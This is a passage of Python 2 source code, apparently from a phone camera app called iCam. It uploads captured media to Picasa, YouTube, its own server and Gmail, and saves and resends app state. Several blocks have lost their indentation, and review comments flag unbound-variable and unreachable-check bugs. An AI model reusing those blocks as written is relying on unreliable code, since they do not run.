        # Linear scan of the user's albums for a title match.
        album = None
        for album in albumsFeed.entry:
            # print "album =", album
            DebugPrint("Title: %s, number of photos: %s, id: %s" % \
                        (album.title.text, album.numphotos.text,
                         album.gphoto_id.text))
            # picasaClient.Delete(album)
            if album.title.text == albumTitle:
                iCamAlbumFound = True
                DebugPrint(" PicasaPhotoUpload(): found albumTitle!")
                break
        if iCamAlbumFound:
            # print "Found"
            iCamAlbum = album
        else:
            # print "Not found"
            """
            !!!!IMPORTANT: Unfortunately this private argument gets translated
            in Picasa in the attribute Visibility - "Anyone with the link".
            Currently to fix this, the user has to go on Picasa and edit the
            attribute manually.
            Find a programatic solution...!!!!
            """
            iCamAlbum = picasaClient.InsertAlbum(title=albumTitle,
                summary="iCam photo album.", location="Bucharest", #!!!!TODO: make location configurable
                access="private")
        # Build the photo entry: title = file name, summary = battery/charger.
        photoEntry = gdata.photos.PhotoEntry()
        photoEntry.title = atom.Title(text=fileName)
        photoEntry.private = gdata.media.Private()
        #photoEntry.summary = atom.Summary(text=fileName)
        photoSummary = "%02d%%" % int(GetBatteryLevelPercentage()) + \
                        " " + "%s" % str(GetChargerStatus())
        photoEntry.summary = atom.Summary(text=photoSummary)
        photoEntry.category.append(atom.Category(
            scheme="http://schemas.google.com/g/2005#kind",
            term="http://schemas.google.com/photos/2007#photo"))
        # Pick the MIME type from the last 4 characters of the path.
        photoFileNameExtension = str.lower(pathFileName[len(pathFileName)-4 :])
        if photoFileNameExtension == ".jpg":
            aContentType = "image/jpeg"
        elif photoFileNameExtension == ".png":
            aContentType = "image/png"
        # NOTE(review): for any other extension aContentType stays unbound and
        # the InsertPhoto() call below raises NameError, swallowed by the bare
        # except: - consider adding a default branch.
        #if fileName != None:
        if aData == None:
            entry = picasaClient.InsertPhoto(iCamAlbum, photoEntry,
                        pathFileName, content_type=aContentType)
        else:
            #if fileName == None:
            #assert aData != None
            fInput = FileObjectBufferWithLenForGdataMedia(aData, \
                        pathFileName, "rb")
            entry = picasaClient.InsertPhoto(iCamAlbum, photoEntry,
                        fInput, content_type=aContentType)
        # TODO: check!!!! Normally fInput gets closed in InsertPhoto()
        """
        'video/mp4' is from
        https://code.google.com/apis/picasaweb/docs/2.0/developers_guide_protocol.html#PostVideo
        (see maybe also
        https://code.google.com/apis/picasaweb/docs/2.0/reference.html).
        But although the documentation above says we can upload video, the
        latest gdata API doesn't allow uploading videos on Picasa:
            Traceback (most recent call last):
            File "iCam.py", line 84, in testInsertPhotoUpdateBlobAndDelete
                pathFileName, content_type='video/mp4')
            File "C:\Python25\lib\site-packages\gdata\photos\service.py", line 396, in InsertPhoto
                ['image/'+t for t in SUPPORTED_UPLOAD_TYPES]
            GooglePhotosException: (602, "Accepted content types: ['image/bmp',
            'image/jpeg', 'image/jpg', 'image/gif', 'image/png']",
            'This is not a valid content type: video/mp4')
        """
    except:
        # Best-effort cleanup of the buffer file object, then error reporting.
        try:
            if fInput is not None:
                fInput.close()
            DebugPrint("PicasaPhotoUpload(): Closed (or attempted to) the " \
                        "file uploaded to Picasa.")
        except:
            DebugPrintErrorTrace()
        #entry = picasaClient.InsertVideo(iCamAlbum, photoEntry, pathFileName,
        #    content_type='video/mp4')
        # """
        #self.assert_(entry.id.text)
        #updated_entry = picasaClient.UpdatePhotoBlob(entry, pathFileName)
        #self.assert_(entry.GetEditLink().href !=
        #    updated_entry.GetEditLink().href)
        # picasaClient.Delete(updated_entry)
        # In case there was an error when uploading to YouTube, then save the
        # media file to the Unsent folder.
        """
        storeLocallyMedia == 0 because in case we don't store it THEN we
        save it in Unsent
        """
        if (storeLocallyMedia == 0) and (useiCamServer != 2):
            if saveUnsentPackets > 0:
                """
                Note: we could save this file in LOCAL_FOLDER_MEDIA, but in
                Unsent is more appropriate.
                """
                MoveFileBetweenAnyDrives(pathFileName,
                    LOCAL_FOLDER_UNSENT_FILES + "/" + fileName)
        (exceptionType, exceptionValue, exceptionTraceback) = sys.exc_info()
        errorStr = "Exception in PicasaPhotoUpload() - details: free_ram = %d."\
                    " exceptionTraceback = %s, exceptionType = %s, " \
                    "exceptionValue = %s. Bailing out..." % \
                    (GetFreeRAM(),
                     repr(traceback.format_tb(exceptionTraceback)),
                     str(exceptionType), str(exceptionValue))
        if MY_DEBUG_UPLOAD_MSG:
            UploadGZippedData(aDeviceId, errorStr, ICAM_SERVER_NAME,
                WEBPAGE_UL_GZIPPED_TEXT, None)
        DebugPrint(errorStr)
        DebugPrintErrorTrace()
        # NOTE(review): exceptionValue is an exception object; comparing it
        # with == against a tuple is always False, so this Quit() on
        # "Token expired" appears unreachable - same pattern as the timeout
        # check in ConnectToPicasaGData().
        if exceptionValue == (403, "Forbidden", "Token expired"):
            Quit()
        return -1
def GetYouTubeUserProfile():
    """Fetch the YouTube user entry for googleUsername and return the
    profile description text (also emitted via DebugPrint)."""
    global googleUsername
    profileUrl = "https://gdata.youtube.com/feeds/users/" + googleUsername
    userEntry = youtubeClient.GetYouTubeUserEntry(profileUrl)
    descriptionText = userEntry.description.text
    DebugPrint("GetYouTubeUserProfile(): userEntry.description.text = %s" %
               str(descriptionText))
    return descriptionText
"""
It is really mandatory to have both parameters fileName and pathFileName
because the callers can pass pathFileName with values
"D:/iCamTemp.3gp" (or pathFileName = "D:/iCamTemp.jpg", or
"D:/iCamTemp.amr")
and they should pass the useful names (e.g., 2011_01_10_13_50_00_100.3gp)
through fileName.
If (fileName is None) we only save state.bin.
We use (fileName == "[!NO_FILE]") to send only the state to the server
- e.g., used when wanting to send GPS info, but no media.
"""
if SYMBIAN_OS:
if _PyS60_1_9_OR_NEWER: #pyS60VersionNumber > 14:
mediaUploadedLock = e32.Ao_lock()
STORE_STATE = True
"""
stateMarshalled is None when StoreState() is NOT called from
UploadStateAndFileAndStoreState()
stateMarshalled - we can specify the state, s.t. we don't call
BuildState() anymore.
"""
def StoreState(aDeviceId=deviceId, stateMarshalled=None):
    """Persist the marshalled application state, zlib-compressed, to
    STATE_PATH_FILENAME, keeping the previous file as
    STATE_PATH_FILENAME_BACKUP.

    If stateMarshalled is None the state is rebuilt via BuildState().
    Returns 0 on success, -1 on write failure, None when STORE_STATE is off.
    """
    global STORE_STATE
    if not STORE_STATE:
        return
    # Platform-specific screen refresh hooks, piggybacked on the periodic
    # state save.
    if SYMBIAN_S60_OS:
        if SYMBIAN_3:
            # !!Maybe do it even less often
            if stateMarshalled is None:
                """
                We call RedrawHandler() since normally it is invoked very
                rare on S^3 devices (test S^1 devices!!!) - only at
                the beginning of iCam 2-3 times and at Quit().
                """
                RedrawHandler(None)
    elif ANDROID_OS:
        """
        After a few calls this might crash the Option Menu
        (maybe the SL4A "server", as well) - and I'm stuck
        """
        DisplayRedrawInfo(partialForAndroid=True)
    if stateMarshalled is None:
        #if aDeviceId is None:
        #    aDeviceId = deviceId
        aCrtTime = GetCurrentDateTime()
        stateMarshalled = BuildState(cameraId=-1, crtTime=aCrtTime,
                            numMilliseconds=0, fileName=None,
                            pathFileName=None)
    # Rotate: drop the old backup, then rename current state -> backup.
    try:
        # if os.path.exists(STATE_PATH_FILENAME_BACKUP):
        if os.path.isfile(STATE_PATH_FILENAME_BACKUP):
            os.unlink(STATE_PATH_FILENAME_BACKUP)
    except:
        DebugPrintErrorTrace()
    try:
        # if os.path.exists(STATE_PATH_FILENAME):
        if os.path.isfile(STATE_PATH_FILENAME):
            os.rename(STATE_PATH_FILENAME, STATE_PATH_FILENAME_BACKUP)
            DebugPrint("StoreState(): renamed %s to %s." % \
                        (STATE_PATH_FILENAME, STATE_PATH_FILENAME_BACKUP))
    except:
        DebugPrintErrorTrace()
    try:
        fOutput = open(STATE_PATH_FILENAME, "wb")
        # fOutput.write(stateMarshalled)
        # NOTE: str.encode("zlib") is a Python 2-only codec.
        fOutput.write(stateMarshalled.encode("zlib"))
        # fOutput.flush()
        fOutput.close()
        DebugPrint("StoreState(): Wrote state file %s." % \
                    STATE_PATH_FILENAME)
    except:
        (exceptionType, exceptionValue, exceptionTraceback) = sys.exc_info()
        errorStr = "Exception in StoreState() " \
                    "when writing locally stateMarshalled to %s - " \
                    "details: free_ram = %d. exceptionTraceback = %s, "\
                    "exceptionType = %s, exceptionValue = %s. " \
                    "Bailing out..." % \
                    (STATE_PATH_FILENAME, GetFreeRAM(),
                     repr(traceback.format_tb(exceptionTraceback)),
                     str(exceptionType), str(exceptionValue))
        if MY_DEBUG_UPLOAD_MSG:
            UploadGZippedData(aDeviceId, errorStr,
                ICAM_SERVER_NAME, WEBPAGE_UL_GZIPPED_TEXT, None)
        DebugPrint(errorStr)
        DebugPrintErrorTrace()
        return -1
    return 0
"""
We declare it here, just before the function UploadStateAndFileAndStoreState()
which uses it, because we use it also in the 2 functions
MyFuncYouTubeVideoUpload() and MyFuncYouTubeVideoUpload(), inner to
UploadStateAndFileAndStoreState().
"""
googleRes = None
NUM_RETRIES_SEND_VIA_YOUTUBE = 2 #3
def UploadStateAndFileAndStoreState(aDeviceId, cameraId,
        fileName, pathFileName,
        inetServerAddress, pageOnServer, singleThreaded=False):
    """Marshal the current state, upload the media file (if any) to
    YouTube/Picasa and/or the iCam server, and store the state locally.

    fileName is None -> only StoreState() is performed.
    fileName == NO_MEDIA_FILE_NAME -> state only is sent (no media bytes).
    singleThreaded -- when False, the Google upload runs in a worker thread
    and signals mediaUploadedLock on Symbian.
    Returns StoreState()'s result, the server-upload result, or None when
    the outer try fails (errors are swallowed by the final bare except).
    """
    global googleRes
    DebugPrint("Entered UploadStateAndFileAndStoreState() at %s." % \
                GetCurrentDateTimeStringWithMilliseconds())
    try:
        crtTime = GetCurrentDateTime()
        crtTime2 = GetTime()
        # See http://discussion.forum.nokia.com/forum/showthread.php?116978-What-is-the-time-granularity-in-Pys60 .
        # Fractional part of the epoch seconds -> millisecond component.
        numMilliseconds = (crtTime2 - int(crtTime2)) * 1000
        # PetWatchdog()
        """
        In case we upload media file to Google, BUT NOT to iCam server
        (useiCamServer == 1, uploadMediaToYouTube = True,
        uploadMediaToPicasa = True)
        we still report in the state data the file size and the filename.
        But we just don't send the media file - the server can easily
        realize this.
        """
        #if (useiCamServer == 1) or (fileName == NO_MEDIA_FILE_NAME):
        if fileName == NO_MEDIA_FILE_NAME:
            fileName2 = NO_MEDIA_FILE_NAME
        else:
            fileName2 = fileName
        stateMarshalled = BuildState(cameraId, crtTime, numMilliseconds,
                            fileName2, pathFileName)
        DebugPrint("UploadStateAndFileAndStoreState(): " \
                    "len(stateMarshalled) = %d." % len(stateMarshalled))
        """
        stateStr = "%d %d %d %d %d %d " % (GetBatteryLevelPercentage(),
            pauseInterval, burstModeIsStarted,
            photoResolutionIndex, digitalZoom, photoQuality)
        """
        # We can save the state at each invocation.
        #res = StoreState(aDeviceId, stateMarshalled)
        if fileName is None:
            res = StoreState(aDeviceId, stateMarshalled)
            return res
        googleRes = 0
        #######################################################################
        #######################################################################
        ########### First, we upload the media to YouTube/Picasa. #############
        #######################################################################
        #######################################################################
        if str.lower(fileName[len(fileName) - 4:]) in [".3gp", ".mp4"]:
            # if serversUsed == 4:
            if uploadMediaToYouTube:
                def MyFuncYouTubeVideoUpload():
                    # Worker closure: retry the YouTube upload with
                    # exponential backoff, then signal the waiting thread.
                    global googleRes
                    """
                    googleRes = YouTubeVideoUpload(pathFileName, fileName,
                        googleKeywords, crtTime, None, None,
                        deviceId, cameraId)
                    """
                    for i in range(NUM_RETRIES_SEND_VIA_YOUTUBE):
                        googleRes = YouTubeVideoUpload(pathFileName, fileName,
                            googleKeywords, crtTime, str(int(numMilliseconds)),
                            None, deviceId, cameraId,
                            int(GetBatteryLevelPercentage()),
                            int(GetChargerStatus()))
                        if googleRes == -1:
                            DebugPrint("MyFuncYouTubeVideoUpload(): " \
                                        "YouTubeVideoUpload() returned %d." %
                                        googleRes)
                        else:
                            break
                        # Do an "exponential backoff" time interval wait
                        SleepAndPetWatchdog( int(0.1 * (2**i)) )
                    else:
                        """
                        Executed only if break was not used --> we have reached
                        this only if we failed NUM_RETRIES_SEND_VIA_YOUTUBE
                        times.
                        """
                        DebugPrint("We failed NUM_RETRIES_SEND_VIA_YOUTUBE " \
                                    "times --> we drop this media packet.")
                    """
                    When using FileObjectBufferWithLenForGdataMedia() we do
                    not really require to use mediaUploadedLock.
                    In principle, the other thread, which can go back to
                    VideoRecordAndUpload() can proceed without waiting to
                    finish the upload, although this is not great since
                    YouTube puts a limit on the frequency of videos
                    uploaded on the established connection.
                    """
                    if singleThreaded == False:
                        if SYMBIAN_OS:
                            if _PyS60_1_9_OR_NEWER: #pyS60VersionNumber > 14:
                                mediaUploadedLock.signal()
                if singleThreaded == True:
                    MyFuncYouTubeVideoUpload()
                else:
                    # if storeLocallyMedia == 0:
                    #     MyFuncYouTubeVideoUpload()
                    MyThreadStart(MyFuncYouTubeVideoUpload)
        elif str.lower(fileName[len(fileName) - 4:]) in \
                [".jpg", ".png", ".bmp"]:
            # mediaFileData = ""
            # if serversUsed == 4:
            if uploadMediaToPicasa:
                def MyFuncPicasaPhotoUpload():
                    # Worker closure: single Picasa upload attempt, then
                    # signal the waiting thread (no retry loop here).
                    global googleRes
                    # PicasaPhotoUpload(albumTitle, pathFileName, fileName)
                    # PicasaPhotoUpload(pathFileName, fileName, crtTime)
                    """
                    googleRes = PicasaPhotoUpload(pathFileName, fileName,
                        googleKeywords, crtTime, None, None,
                        deviceId, cameraId)
                    """
                    googleRes = PicasaPhotoUpload(pathFileName, fileName,
                        googleKeywords, crtTime, str(int(numMilliseconds)),
                        None, deviceId, cameraId)
                    if singleThreaded == False:
                        if SYMBIAN_OS:
                            if _PyS60_1_9_OR_NEWER: #pyS60VersionNumber > 14:
                                mediaUploadedLock.signal()
                if singleThreaded == True:
                    MyFuncPicasaPhotoUpload()
                else:
                    # if storeLocallyMedia == 0:
                    #     MyFuncPicasaPhotoUpload()
                    MyThreadStart(MyFuncPicasaPhotoUpload)
        # mediaFileData = ""
        if googleRes == -1:
            # if SYMBIAN_OS:
            if SYMBIAN_S60_OS:
                # audio.say(u"I can't get no satisfaction")
                audio.say(u"Error")
            else:
                pass
        #######################################################################
        #######################################################################
        #######We uploaded (if requested) the media to YouTube/Picasa.#########
        ######## Now we prepare to upload media to the iCam server. ###########
        #######################################################################
        #######################################################################
        mediaFileData = ""
        # if serversUsed != 4:
        #if uploadMediaToiCamServer:
        if useiCamServer == 2:
            if fileName == NO_MEDIA_FILE_NAME:
                """
                We do not append to the SMF packet the media data:
                mediaFileData == ""
                """
                pass
            else:
                """
                if uploadMediaToYouTube and \
                        (str.lower(fileName[-4:]) in [".3gp", ".mp4"]):
                    pass
                """
                # Read the binary file from disk.
                try:
                    fInput = open(pathFileName, "rb")
                    mediaFileData = fInput.read()
                    fInput.close()
                except:
                    (exceptionType, exceptionValue, exceptionTraceback) = \
                        sys.exc_info()
                    errorStr = "Exception in " \
                                "UploadStateAndFileAndStoreState() at %s " \
                                "with pathFileName = %s - details: " \
                                "free_ram = %d. " \
                                "exceptionTraceback = %s, " \
                                "exceptionType = %s, " \
                                "exceptionValue = %s. Bailing out..." \
                                % (
                                   GetCurrentDateTimeStringNice(),
                                   pathFileName,
                                   GetFreeRAM(),
                                   repr(traceback.format_tb(exceptionTraceback)),
                                   str(exceptionType),
                                   str(exceptionValue)
                                  )
                    if MY_DEBUG_UPLOAD_MSG:
                        UploadGZippedData(aDeviceId, errorStr,
                            ICAM_SERVER_NAME,
                            WEBPAGE_UL_GZIPPED_TEXT, None)
                    DebugPrint("Exception in " \
                                "UploadStateAndFileAndStoreState() at %s " \
                                "with pathFileName = %s. Bailing out..." % \
                                (GetCurrentDateTimeStringNice(),
                                 pathFileName))
                    DebugPrintErrorTrace()
                    return -1
                if ERASE_ORIGINAL_MEDIA_FILE_AFTER_READ:
                    try:
                        os.unlink(pathFileName)
                    except:
                        # os.remove()
                        DebugPrintErrorTrace()
        """
        UploadText("The JPEG has %d bytes." % len(data), ICAM_SERVER_NAME, \
            WEBPAGE_UL_GZIPPED_TEXT)
        """
        #data = message + STRING_SEPARATOR + filename + STRING_SEPARATOR + data
        # SMF packet = marshalled state immediately followed by media bytes.
        uploadData = stateMarshalled + mediaFileData
        """
        UploadText("The uncompressed SMF has %d bytes." % len(data), \
            ICAM_SERVER_NAME, WEBPAGE_UL_GZIPPED_TEXT)
        """
        DebugPrint("UploadStateAndFileAndStoreState(): Sending data of " \
                    "size %d (accessPointName = %s, bluetoothMode = %d)." % \
                    (len(uploadData), accessPointName, bluetoothMode))
        #return UploadGZippedData(data, ......, inetServerAddress,
        #    pageOnServer)
        # if inetServerAddress is None:
        myText = "UploadStateAndFileAndStoreState() - details: " \
                    "aDeviceId = %s, fileName = %s, pathFileName = %s, " \
                    "cameraId = %d, time = %s, free_ram = %d." % \
                    (
                     aDeviceId, fileName, pathFileName,
                     cameraId, GetCurrentDateTimeStringNice(),
                     GetFreeRAM()
                    )
        DebugPrint(myText)
        if MY_DEBUG_STDERR_2:
            sys.stderr.write(myText + "\n")
            sys.stderr.flush()
        # Normally, if no error, UploadGZippedData returns 0
        res = 0
        #if USE_ICAM_SERVER or bluetoothMode == 2:
        if (useiCamServer > 0) or (bluetoothMode == 2):
            res = UploadGZippedData(aDeviceId, uploadData, inetServerAddress,
                    pageOnServer, fileName)
        if res == -1:
            # if SYMBIAN_OS:
            if SYMBIAN_S60_OS:
                # audio.say(u"I can't get no satisfaction")
                audio.say(u"Error")
        return res
    except:
        DebugPrintErrorTrace()
"""
Used by BluetoothMessageProcessAndDelete(btMsgId) --> WE MUST NOT CHECK FOR
uploadUnsentData HERE, BUT IN THE caller of this function.
"""
def UploadUnsentBinaryData(aDeviceId, fileName, fileData):
global deviceId
try:
PetWatchdog()
myText = "UploadUnsentBinaryData(aDeviceId = %s, fileName = %s): at " \
"%s, calling InternetUploadBinaryData() with data of " \
"size %d." % (aDeviceId, fileName,
GetCurrentDateTimeStringNice(), len(fileData))
DebugPrint(myText)
if MY_DEBUG_UPLOAD_MSG:
UploadGZippedData(deviceId, myText, ICAM_SERVER_NAME,
WEBPAGE_UL_GZIPPED_TEXT, None)
"""
if NEW_BT_FORMAT:
if fileName[-4:] in BT_OBEX_EXTENSION_LIST_TXT:
serverPageToConnectTo = WEBPAGE_UL_GZIPPED_TEXT
elif fileName[-4:] in BT_OBEX_EXTENSION_LIST_SMF:
serverPageToConnectTo = WEBPAGE_UL_GZIPPED_STATE_AND_FILE
elif fileName[-4:] in BT_OBEX_EXTENSION_LIST_FIL:
serverPageToConnectTo = WEBPAGE_UL_GZIPPED_FILE
else:
if fileName.endswith(EXTENSION_TEXT_MESSAGE):
serverPageToConnectTo = WEBPAGE_UL_GZIPPED_TEXT
elif fileName.endswith(EXTENSION_STATE_AND_MEDIA_FILE):
serverPageToConnectTo = WEBPAGE_UL_GZIPPED_STATE_AND_FILE
elif fileName.endswith(EXTENSION_ARBITRARY_FILE):
serverPageToConnectTo = WEBPAGE_UL_GZIPPED_FILE
"""
if fileName.endswith(EXTENSION_TEXT_MESSAGE):
serverPageToConnectTo = WEBPAGE_UL_GZIPPED_TEXT
elif fileName.endswith(EXTENSION_STATE_AND_MEDIA_FILE):
serverPageToConnectTo = WEBPAGE_UL_GZIPPED_STATE_AND_FILE
elif fileName.endswith(EXTENSION_ARBITRARY_FILE):
serverPageToConnectTo = WEBPAGE_UL_GZIPPED_FILE
res = InternetUploadBinaryData(fileData, ICAM_SERVER_NAME,
serverPageToConnectTo)
"""
UploadStateAndFileAndStoreState(aDeviceId, cameraId, fileName, pathFileName,
aYear, aMonth, aDay, aHour, aMinute, aSecond,
ICAM_SERVER_NAME, WEBPAGE_UL_GZIPPED_STATE_AND_FILE)
"""
if res == -1:
DebugPrint("UploadUnsentBinaryData(%s): unsuccessful " \
"InternetUploadBinaryData(). Returning..." % aDeviceId)
"""
!!!!!!!!I should save the unsent BT message for later resend(s).
fOutput = open(pathFileName, "rb")
fileData = fInput.read()
fInput.close()
"""
return
"""
if aDeviceId == deviceId:
DebugPrint("UploadUnsentBinaryData(%s): After successful " \
"InternetUploadBinaryData(), deleting temporary " \
"unsent file %s." % (aDeviceId, pathFileName))
os.unlink(pathFileName)
else:
DebugPrint("UploadUnsentBinaryData(%s) - relayed data: " \
"After successful InternetUploadBinaryData(), " \
"deleting unsent file %s - remember that we have " \
"the corresponding media file already saved in the " \
"Media folder." % (aDeviceId, pathFileName))
os.unlink(pathFileName)
"""
except:
#import shutil
#shutil.move(pathFileName, LOCAL_FOLDER_MEDIA_FILES + "/" + fileName)
DebugPrintErrorTrace()
def UploadUnsentFile(aDeviceId, pathFileName):
    """Read one unsent packet file from disk, upload it to the iCam server
    (target page chosen from the extension), then delete the file.

    aDeviceId may differ from this device's deviceId for BT-relayed data;
    only the log message differs between the two cases.  Errors are logged
    and swallowed.
    """
    global deviceId
    try:
        PetWatchdog()
        myText = "UploadUnsentFile(%s): at %s, calling " \
                    "InternetUploadBinaryData() with data from file %s of " \
                    "size %d bytes." % \
                    (aDeviceId, GetCurrentDateTimeStringWithMilliseconds(),
                     pathFileName, os.path.getsize(pathFileName))
        DebugPrint(myText)
        if MY_DEBUG_UPLOAD_MSG:
            UploadGZippedData(deviceId, myText, ICAM_SERVER_NAME,
                WEBPAGE_UL_GZIPPED_TEXT, None)
        """
        #!!!!
        if pathFileName.endswith(EXTENSION_COMMAND_MESSAGE):
            serverPageToConnectTo = WEBPAGE_UL_GZIPPED_TEXT
        """
        # Map packet type (by extension) to the server upload page.
        # NOTE(review): if no extension matches, serverPageToConnectTo stays
        # unbound -> NameError, caught by the bare except at the bottom.
        if pathFileName.endswith(EXTENSION_TEXT_MESSAGE):
            serverPageToConnectTo = WEBPAGE_UL_GZIPPED_TEXT
        elif pathFileName.endswith(EXTENSION_STATE_AND_MEDIA_FILE):
            serverPageToConnectTo = WEBPAGE_UL_GZIPPED_STATE_AND_FILE
        elif pathFileName.endswith(EXTENSION_ARBITRARY_FILE):
            serverPageToConnectTo = WEBPAGE_UL_GZIPPED_FILE
        fInput = open(pathFileName, "rb")
        fileData = fInput.read()
        fInput.close()
        """
        #To experiment burst of packets you can do a forever loop and send one
        # unsent packet
        while True:
        """
        res = InternetUploadBinaryData(fileData, ICAM_SERVER_NAME,
                serverPageToConnectTo)
        """
        UploadStateAndFileAndStoreState(aDeviceId, cameraId,
            fileName, pathFileName,
            aYear, aMonth, aDay, aHour, aMinute, aSecond,
            ICAM_SERVER_NAME, WEBPAGE_UL_GZIPPED_STATE_AND_FILE)
        """
        if res == -1:
            """
            DebugPrint("UploadUnsentFile(%s): unsuccessful " \
                        "InternetUploadBinaryData(). Returning..." % \
                        (aDeviceId))
            return
            """
            # On failure InternetUploadBinaryData() keeps the data queued for
            # a later retry, so we fall through and delete the file below.
            DebugPrint("UploadUnsentFile(%s): unsuccessful " \
                        "InternetUploadBinaryData(). " \
                        "InternetUploadBinaryData() saved to transmit later " \
                        "the data." % aDeviceId)
        if aDeviceId == deviceId:
            DebugPrint("UploadUnsentFile(%s): After successful " \
                        "InternetUploadBinaryData(), deleting temporary " \
                        "media file %s." % \
                        (aDeviceId, pathFileName))
            os.unlink(pathFileName)
        else:
            DebugPrint("UploadUnsentFile(%s) - relayed data: After " \
                        "successful InternetUploadBinaryData(), deleting " \
                        ".sfm file %s - remember that we have the " \
                        "corresponding media file already saved in the " \
                        "Media folder." % (aDeviceId, pathFileName))
            os.unlink(pathFileName)
            """
            newPathName = LOCAL_FOLDER_MEDIA_FILES + "/" + aDeviceId
            newPathFileName = newPathName + "/" + fileName
            DebugPrint("UploadUnsentFile(%s): After successful " \
                        "InternetUploadBinaryData(), moving file %s to %s - " \
                        "after unmarshalling the media file from it." % \
                        (aDeviceId, pathFileName, newPathFileName))
            if not os.path.exists(newPathName):
                os.makedirs(newPathName)
            os.rename(pathFileName, newPathFileName)
            """
    except:
        #import shutil
        #shutil.move(pathFileName, LOCAL_FOLDER_MEDIA_FILES + "/" + fileName)
        DebugPrintErrorTrace()
def DoNotUploadUnsent():
    """Return True when unsent packets must NOT be uploaded: the
    uploadUnsentData mode disables it, we are conserving energy, or this
    is the excluded N95 device."""
    global deviceId, conserveEnergy, uploadUnsentData
    uploadDisabled = uploadUnsentData not in (1, 3)
    return uploadDisabled or conserveEnergy or deviceId == IMEI_N95
def UploadUnsentFolder(aDeviceId, pathFolderName):
    """Upload every .smf/.fil unsent packet in pathFolderName, oldest first
    (lexicographic file-name order), periodically polling the server for
    new commands.

    Aborts early (return) as soon as DoNotUploadUnsent() becomes True.
    Errors are logged and swallowed.
    """
    try:
        DebugPrint("UploadUnsentFolder(%s): pathFolderName = %s." % \
                    (aDeviceId, pathFolderName))
        folderContent = os.listdir(pathFolderName)
        """
        # Use reverse = False to send first the oldest ones (like this you
        # send in chronological order). Use reverse = True for sending
        # first the most recent ones.
        sortedFolderContent = sorted(folderContent, reverse = False)
        """
        # sort() without parameters is the ONLY one that works in Python 2.2.
        # (Info on sort at http://wiki.python.org/moin/HowTo/Sorting/.)
        folderContent.sort()
        sortedFolderContent = folderContent
        counterUnsentPackets = 0
        for fileName in sortedFolderContent:
            #if True:
            if fileName.endswith(EXTENSION_STATE_AND_MEDIA_FILE) or \
                    fileName.endswith(EXTENSION_ARBITRARY_FILE):
                # or if (fileName.endswith(EXTENSION_TEXT_MESSAGE):
                # Re-check the kill switch before every single upload.
                if DoNotUploadUnsent():
                    DebugPrint("UploadUnsentFolder(): exiting " \
                                "UploadUnsentFolder() because " \
                                "conserveEnergy = %d or " \
                                "uploadUnsentData = %d or deviceId = %s." % \
                                (conserveEnergy, uploadUnsentData,
                                 deviceId))
                    return
                pathFileName = pathFolderName + "/" + fileName
                """
                This should happen only when processing the Unsent folder
                itself.
                """
                if os.path.isdir(pathFileName):
                    pass
                else:
                    UploadUnsentFile(aDeviceId, pathFileName)
                # Every NUM_UNSENT_PACKETS_BEFORE_DOWNLOAD_COMMANDS packets,
                # poll the server for pending commands.
                if counterUnsentPackets % \
                        NUM_UNSENT_PACKETS_BEFORE_DOWNLOAD_COMMANDS == \
                        NUM_UNSENT_PACKETS_BEFORE_DOWNLOAD_COMMANDS - 1:
                    hasDownloadedNewCmd = DownloadCommands()
                counterUnsentPackets += 1
    except:
        DebugPrintErrorTrace()
def UploadUnsentFILES():
    """Upload all unsent packets: this device's own, then those relayed
    for each Bluetooth client (stored in per-device subfolders of Unsent).

    Bails out when there is no Internet connection or when
    DoNotUploadUnsent() says uploading is disabled.
    """
    global deviceId, conserveEnergy, uploadUnsentData
    if NoInternetConnection():
        DebugPrint("UploadUnsentFILES(): NOT entering UploadUnsentFILES() " \
                    "because accessPointName = %s and " \
                    "accessPointRetryConnect = %d." % \
                    (accessPointName, accessPointRetryConnect))
        return
    if DoNotUploadUnsent():
        DebugPrint("UploadUnsentFILES(): NOT entering UploadUnsentFILES() " \
                    "because conserveEnergy = %d or " \
                    "uploadUnsentData = %d or deviceId = %s." % \
                    (conserveEnergy, uploadUnsentData, deviceId))
        return
    DebugPrint("UploadUnsentFILES(): Entering UploadUnsentFILES().")
    # First: the packets that belong to this very device.
    UploadUnsentFolder(deviceId, LOCAL_FOLDER_UNSENT_FILES)
    # Then: the subfolders of Unsent, one per BT client device id.
    try:
        for entry in os.listdir(LOCAL_FOLDER_UNSENT_FILES):
            entryPath = LOCAL_FOLDER_UNSENT_FILES + "/" + entry
            DebugPrint("UploadUnsentFILES(): folderPathName = %s." % \
                entryPath)
            if os.path.isdir(entryPath):
                # The folder name is the BT client's device id.
                UploadUnsentFolder(entry, entryPath)
    except:
        DebugPrintErrorTrace()
try:
import smtplib
from email.MIMEMultipart import MIMEMultipart
from email.MIMEBase import MIMEBase
from email.MIMEText import MIMEText
from email.Utils import COMMASPACE, formatdate
from email import Encoders
except:
DebugPrint("Cannot import modules smtplib and email.*")
DebugPrintErrorTrace()
def UploadByEmailAttachement(sender, recipients, mediaPathFileName):
    """Send mediaPathFileName as an email attachment via GMail SMTP.

    sender: From address; recipients: list of To addresses;
    mediaPathFileName: path of the file to attach. Credentials come from
    the globals googleUsername/googlePassword. All errors are logged and
    swallowed (best-effort upload).
    NOTE(review): subject and body are hard-coded test strings.
    """
    # Inspired from http://docs.python.org/2/library/email-examples.html
    global googleUsername, googlePassword
    DebugPrint("Entered UploadByEmailAttachement()")
    if False:
        DebugPrint(" UploadByEmailAttachement(): googleUsername=%s, " \
            "googlePassword = %s" % (googleUsername, googlePassword))
    try:
        # From http://stackoverflow.com/questions/3362600/how-to-send-email-attachments-with-python/3362673#3362673
        send_to = recipients
        msg = MIMEMultipart()
        msg["From"] = sender
        #msg["To"] = COMMASPACE.join(send_to)
        msg["To"] = ", ".join(send_to)
        msg["Date"] = formatdate(localtime=True)
        #msg["Subject"] = subject
        msg["Subject"] = "Our family reunion2 from Android"
        text = "This is a test email with attachement"
        msg.attach( MIMEText(text) )
        part = MIMEBase("application", "octet-stream")
        # BUGFIX: the attachment file was opened inline and never closed
        # (handle leak); close it explicitly (no 'with' - must run on the
        # ancient Python of PyS60).
        fInput = open(mediaPathFileName, "rb")
        try:
            part.set_payload(fInput.read())
        finally:
            fInput.close()
        Encoders.encode_base64(part)
        part.add_header(
            "Content-Disposition",
            'attachment; filename="%s"' % os.path.basename(mediaPathFileName))
        msg.attach(part)
        #print "msg.as_string() =", msg.as_string()
        server = smtplib.SMTP("smtp.gmail.com:587")
        try:
            # The server.ehlo() are very important for GMail - otherwise, it doesn't work
            server.ehlo()
            server.starttls()
            server.ehlo() # From http://stackoverflow.com/questions/12030179/issue-sending-email-with-python
            server.login(googleUsername, googlePassword)
            server.sendmail(sender, recipients, msg.as_string())
        finally:
            # BUGFIX: close the SMTP socket even when login/send raises,
            # instead of leaking the connection.
